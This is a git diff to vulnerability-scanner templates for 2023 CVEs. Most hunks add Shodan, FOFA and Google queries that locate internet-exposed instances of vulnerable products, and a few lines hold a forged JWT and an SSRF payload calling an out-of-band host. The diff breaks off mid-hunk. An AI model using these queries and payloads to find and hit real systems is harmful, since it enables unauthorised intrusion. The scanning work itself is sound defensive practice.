a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: ivanti product: endpoint_manager_mobile - shodan-query: http.favicon.hash:362091310 + shodan-query: + - http.favicon.hash:362091310 + - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" tags: cve2023,cve,ivanti,mobileiron,epmm,kev diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 7d75702994..43b1073e01 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: xwiki product: xwiki - shodan-query: "XWiki" + shodan-query: + - "XWiki" + - xwiki + - http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,xss diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml index efca725eec..6002a1f4c2 100644 --- a/http/cves/2023/CVE-2023-35162.yaml +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -19,14 +19,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-35162 cwe-id: CWE-79 - epss-score: 0.00127 - epss-percentile: 0.46778 + epss-score: 0.00129 + epss-percentile: 0.47675 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: xwiki product: xwiki - shodan-query: "XWiki" - fofa-query: body="data-xwiki-reference" + shodan-query: + - XWiki + - xwiki + - http.html:"data-xwiki-reference" + fofa-query: "body=\"data-xwiki-reference\"" tags: cve,cve2023,xwiki,xss http: diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 6d1c1f40ad..150d18603f 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: sitecore product: experience_commerce - shodan-query: title:"Sitecore" + shodan-query: + - title:"Sitecore" + - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" tags: cve2023,cve,sitecore,rce diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 959d70c650..d9db823581 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -32,7 +32,9 @@ info: max-request: 1 vendor: lightdash product: lightdash - shodan-query: title:"Lightdash" + shodan-query: + - title:"Lightdash" + - http.title:"lightdash" fofa-query: title="lightdash" google-query: intitle:"lightdash" tags: cve,cve2023,lightdash,lfi diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 3f2061da50..3d7ef28e05 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -29,8 +29,13 @@ info: max-request: 5 vendor: mgt-commerce product: cloudpanel - shodan-query: title:"Cloudpanel" - fofa-query: icon_hash="151132309" + shodan-query: + - title:"Cloudpanel" + - http.title:"cloudpanel" + - http.favicon.hash:"151132309" + fofa-query: + - icon_hash="151132309" + - title="cloudpanel" google-query: intitle:"cloudpanel" tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload variables: diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index 91203fae80..f211cf022d 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: intelbras product: sg_2404_mr_firmware - shodan-query: title:"Intelbras" + shodan-query: + - title:"Intelbras" + - http.title:"intelbras" fofa-query: title="intelbras" google-query: intitle:"intelbras" tags: cve2023,cve,intelbras,switch,exposure diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 22ae0683f6..62893615c7 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -23,11 +23,13 @@ info: cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: webkul product: qloapps - fofa-query: title="QloApps" - tags: cve,cve2023,qloapps,sqli + fofa-query: + - "title=\"QloApps\"" + - title="qloapps" + tags: cve,cve2023,qloapps,sqli,webkul flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 1e306b33f3..fea1904d83 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -19,6 +19,7 @@ info: epss-percentile: 0.86929 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: codekop product: codekop tags: cve,cve2023,codekop,pos,auth-bypass diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index bd8415c11f..01fe648ce7 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: juniper product: junos - shodan-query: title:"Juniper Web Device Manager" + shodan-query: + - title:"Juniper Web Device Manager" + - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 9181d15f53..22dbe5e717 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: icewhale product: casaos - shodan-query: http.html:"/CasaOS-UI/public/index.html" - fofa-query: body="/CasaOS-UI/public/index.html" + shodan-query: + - http.html:"/CasaOS-UI/public/index.html" + - http.html:"/casaos-ui/public/index.html" + fofa-query: + - body="/CasaOS-UI/public/index.html" + - body="/casaos-ui/public/index.html" tags: cve,cve2023,oss,casaos,jwt,icewhale http: diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index edea449c5d..9564b74d53 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: icewhale product: casaos - shodan-query: http.html:"/CasaOS-UI/public/index.html" - fofa-query: body="/CasaOS-UI/public/index.html" + shodan-query: + - http.html:"/CasaOS-UI/public/index.html" + - http.html:"/casaos-ui/public/index.html" + fofa-query: + - body="/CasaOS-UI/public/index.html" + - body="/casaos-ui/public/index.html" tags: cve2023,cve,oss,casaos,jwt,icewhale variables: jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}' diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 80fa48f14c..c0d47bcbfb 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -30,7 +30,9 @@ info: vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 - fofa-query: icon_hash=540706145 + fofa-query: + - icon_hash=540706145 + - title="piwigo" google-query: powered by piwigo tags: cve2023,cve,piwigo,sqli,authenticated diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index edb08ddfc2..04c6803e26 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: xwiki product: xwiki - shodan-query: html:"data-xwiki-reference" + shodan-query: + - html:"data-xwiki-reference" + - xwiki + - http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve2023,cve,xwiki,rce diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 9f3bafac24..bef31bec2a 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: zimbra product: zimbra - shodan-query: http.favicon.hash:475145467 + shodan-query: + - http.favicon.hash:475145467 + - http.favicon.hash:"475145467" fofa-query: icon_hash="475145467" tags: cve2023,cve,zimbra,xss,authenticated,kev diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 829857fc0d..20b9eb486b 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -29,7 +29,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,mflow,lfi,huntr,lfprojects diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 6d11af6d44..3b716b7607 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: nextgen product: mirth_connect - shodan-query: title:"mirth connect administrator" + shodan-query: + - title:"mirth connect administrator" + - http.title:"mirth connect administrator" fofa-query: title="mirth connect administrator" google-query: intitle:"mirth connect administrator" tags: packetstorm,cve2023,cve,nextgen,rce diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 3187e4b027..b695c496a7 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -25,8 +25,12 @@ info: max-request: 2 vendor: icewarp product: icewarp - shodan-query: http.favicon.hash:2144485375 - fofa-query: title="icewarp" + shodan-query: + - http.favicon.hash:2144485375 + - http.title:"icewarp" + fofa-query: + - title="icewarp" + - icon_hash=2144485375 google-query: intitle:"icewarp" tags: cve,cve2023,icearp,icewarp,xss diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 8782959d43..d116fccdef 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: ivanti product: mobileiron_sentry - shodan-query: 'html:"Note: Requires a local Sentry administrative user"' + shodan-query: + - 'html:"Note: Requires a local Sentry administrative user"' + - 'http.html:"note: requires a local sentry administrative user"' fofa-query: 'body="note: requires a local sentry administrative user"' tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index a1a7d66ca9..0bc00ce249 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -26,8 +26,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index a18c54bbb8..100cf46124 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -28,8 +28,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 949dfa0687..f8b24740bd 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -27,9 +27,13 @@ info: max-request: 2 vendor: dahuasecurity product: smart_parking_management - shodan-query: html:"/WPMS/asset" + shodan-query: + - html:"/WPMS/asset" + - http.html:"/wpms/asset" fofa-query: body="/wpms/asset" - zoomeye-query: /WPMS/asset + zoomeye-query: + - /WPMS/asset + - /wpms/asset tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity variables: random_str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index aea850fd7e..c5dfcba420 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: fujitsu product: ip-he950e_firmware - shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' + shodan-query: + - '"Server: thttpd/2.25b 29dec2003" content-length:1133' + - '"server: thttpd/2.25b 29dec2003" content-length:1133' max-req: 1 tags: cve2023,cve,fujitsu,ip-series diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index 0b8ad635ce..d5a56fc2fa 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3844 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 09c0af296a..fcf37f3846 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: copyparty_project product: copyparty - shodan-query: title:"copyparty" + shodan-query: + - title:"copyparty" + - http.title:"copyparty" fofa-query: title="copyparty" google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 7a937c1c6d..01ff2422b2 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -29,8 +29,13 @@ info: max-request: 2 vendor: metabase product: metabase - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" + shodan-query: + - http.title:"Metabase" + - http.title:"metabase" + fofa-query: + - app="Metabase" + - title="metabase" + - app="metabase" google-query: intitle:"metabase" tags: cve2023,cve,metabase,oss,rce variables: diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index 6fb0560f37..c6f181dc4e 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -27,7 +27,9 @@ info: vendor: creativeitem product: academy_lms shodan-query: http.html:"academy lms" - fofa-query: body="Academy LMS" + fofa-query: + - body="Academy LMS" + - body="academy lms" tags: cve2023,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 04a9e3c513..defbe64808 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -22,7 +22,9 @@ info: max-request: 3 vendor: opnsense product: opnsense - shodan-query: title:"OPNsense" + shodan-query: + - title:"OPNsense" + - http.title:"opnsense" fofa-query: title="opnsense" google-query: intitle:"opnsense" tags: cve2023,cve,opnsense,xss,authenticated,rce diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 87850f6e68..1b938916dd 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -29,8 +29,10 @@ info: max-request: 1 vendor: microsoft product: windows - shodan-query: title:"FileMage" - tags: cve2023,cve,packetstorm,lfi,filemage + shodan-query: + - title:"FileMage" + - cpe:"cpe:2.3:o:microsoft:windows" + tags: cve2023,cve,packetstorm,lfi,filemage,microsoft http: - method: GET diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index dfaa8f2b83..886fec2405 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -24,7 +24,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 4695da7659..0ab820a891 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -24,7 +24,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfi diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 84919e4c5f..214d40a6dc 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -24,7 +24,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 962ddcd133..7780e0ce72 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: ziahamza product: webui-aria2 - shodan-query: title:"Aria2 WebUI" + shodan-query: + - title:"Aria2 WebUI" + - http.title:"aria2 webui" fofa-query: title="aria2 webui" google-query: intitle:"aria2 webui" tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 67e334eca5..99f44d3e25 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: papercut product: papercut_mf - shodan-query: html:"content=\"PaperCut\"" - fofa-query: body="papercut" + shodan-query: + - html:"content=\"PaperCut\"" + - http.html:"papercut" + - http.html:"content=\"papercut\"" + - cpe:"cpe:2.3:a:papercut:papercut_mf" + fofa-query: + - body="papercut" + - body="content=\"papercut\"" tags: cve2023,cve,lfi,papercut http: diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 182469a15f..b5bc7e7301 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -27,9 +27,18 @@ info: max-request: 1 vendor: cacti product: cacti - shodan-query: title:"Login to Cacti" - fofa-query: icon_hash="-1797138069" - google-query: intitle:"cacti" + shodan-query: + - title:"Login to Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve2023,cve,cacti,sqli http: diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 93632ed6a7..fc13a1cbc9 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: icewarp product: webclient - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2023,cve,xss,icewarp diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 58f1e953e7..bd637c4b08 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -25,8 +25,13 @@ info: max-request: 1 vendor: icewarp product: icewarp - shodan-query: title:"icewarp" - fofa-query: title="icewarp" + shodan-query: + - title:"icewarp" + - http.favicon.hash:2144485375 + - http.title:"icewarp" + fofa-query: + - title="icewarp" + - icon_hash=2144485375 google-query: intitle:"icewarp" tags: cve,cve2023,icewarp,xss diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 4cb540787a..d0a46833b4 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -26,7 +26,9 @@ info: vendor: fieldthemes product: fieldpopupnewsletter framework: prestashop - shodan-query: html:"fieldpopupnewsletter" + shodan-query: + - html:"fieldpopupnewsletter" + - http.html:"fieldpopupnewsletter" fofa-query: body="fieldpopupnewsletter" tags: cve2023,cve,prestashop,xss,fieldthemes diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index 51b127efc6..0504ff9dc0 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -26,7 +26,9 @@ info: vendor: simpleimportproduct_project product: simpleimportproduct framework: prestashop - shodan-query: http.component:"PrestaShop" + shodan-query: + - http.component:"PrestaShop" + - http.component:"prestashop" tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project http: diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index 1e99397e05..f6da835bb6 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -24,9 +24,18 @@ info: max-request: 1 vendor: icewarp product: mail_server - shodan-query: http.title:"IceWarp Server Administration" - fofa-query: title="icewarp server administration" - google-query: intitle:"icewarp server administration" + shodan-query: + - http.title:"IceWarp Server Administration" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve,cve2023,icewarp,xss,unauth http: diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index e4204363ec..65907be765 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -23,7 +23,9 @@ info: max-request: 1 vendor: icewarp product: deep_castle_g2 - shodan-query: title:"IceWarp" + shodan-query: + - title:"IceWarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2023,cve,icewarp,redirect diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index 30dc5b1d7d..80c04eaec1 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: phpjabbers product: shuttle_booking_software - shodan-query: html:"PHP Jabbers.com" + shodan-query: + - html:"PHP Jabbers.com" + - http.html:"php jabbers.com" fofa-query: body="php jabbers.com" tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index aafc07dd22..a5a9fe71b8 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: phpjabbers product: taxi_booking_script - shodan-query: html:"PHP Jabbers.com" + shodan-query: + - html:"PHP Jabbers.com" + - http.html:"php jabbers.com" fofa-query: body="php jabbers.com" tags: cve,cve2023,packetstorm,xss,phpjabbers diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index e4930430c5..e43edf1e32 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -25,8 +25,16 @@ info: vendor: qlik product: qlik_sense framework: windows - shodan-query: html:"Qlik" - fofa-query: app="qlik-sense" + shodan-query: + - html:"Qlik" + - http.favicon.hash:-74348711 + - http.html:"qlik" + - http.title:"qlik-sense" + fofa-query: + - app="qlik-sense" + - title="qlik-sense" + - icon_hash=-74348711 + - body="qlik" google-query: intitle:"qlik-sense" tags: cve2023,cve,kev,qlik,smuggling,windows diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index bfb288fc63..f7905e4745 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -25,8 +25,15 @@ info: vendor: qlik product: qlik_sense framework: windows - shodan-query: http.favicon.hash:-74348711 - fofa-query: app="qlik-sense" + shodan-query: + - http.favicon.hash:-74348711 + - http.html:"qlik" + - http.title:"qlik-sense" + fofa-query: + - app="qlik-sense" + - title="qlik-sense" + - icon_hash=-74348711 + - body="qlik" google-query: intitle:"qlik-sense" tags: cve2023,cve,qlik,traversal,kev,windows diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index e00b6dbf25..8d20471505 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -30,7 +30,10 @@ info: vendor: moosocial product: moostore shodan-query: http.favicon.hash:"702863115" - fofa-query: mooSocial + fofa-query: + - mooSocial + - moosocial + - icon_hash="702863115" tags: cve2023,cve,packetstorm,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 45a9412938..2852509cb3 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -30,7 +30,9 @@ info: vendor: moosocial product: moostore shodan-query: http.favicon.hash:"702863115" - fofa-query: icon_hash="702863115" + fofa-query: + - icon_hash="702863115" + - moosocial tags: cve,cve2023,packetstorm,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index 83b280095d..840c4334e5 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -24,9 +24,11 @@ info: max-request: 1 vendor: microsoft product: skype_for_business_server - shodan-query: html:"Skype for Business" + shodan-query: + - html:"Skype for Business" + - http.html:"skype for business" fofa-query: body="skype for business" - tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev + tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 03cb6859b5..a595d0cccc 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: craftcms product: craft_cms - shodan-query: http.favicon.hash:-47932290 - fofa-query: icon_hash=-47932290 + shodan-query: + - http.favicon.hash:-47932290 + - cpe:"cpe:2.3:a:craftcms:craft_cms" + - http.html:craftcms + fofa-query: + - icon_hash=-47932290 + - body=craftcms publicwww-query: "craftcms" tags: cve2023,cve,rce,unauth,craftcms diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 2af71c7c71..260cec8948 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -14,7 +14,14 @@ info: metadata: verified: true max-request: 1 - shodan-query: "/opencms/" + shodan-query: + - "/opencms/" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" + product: opencms + vendor: alkacon + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve,cve2023,xss,opencms http: diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index fd3dbfd808..2a148fce70 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: fit2cloud product: jumpserver - fofa-query: title="JumpServer" + fofa-query: + - title="JumpServer" + - title="jumpserver" tags: cve2023,cve,jumpserver,exposure,fit2cloud http: diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 8b171bec3f..7d2584371d 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -25,8 +25,13 @@ info: max-request: 5 vendor: jetbrains product: teamcity - shodan-query: title:TeamCity - fofa-query: title=TeamCity + 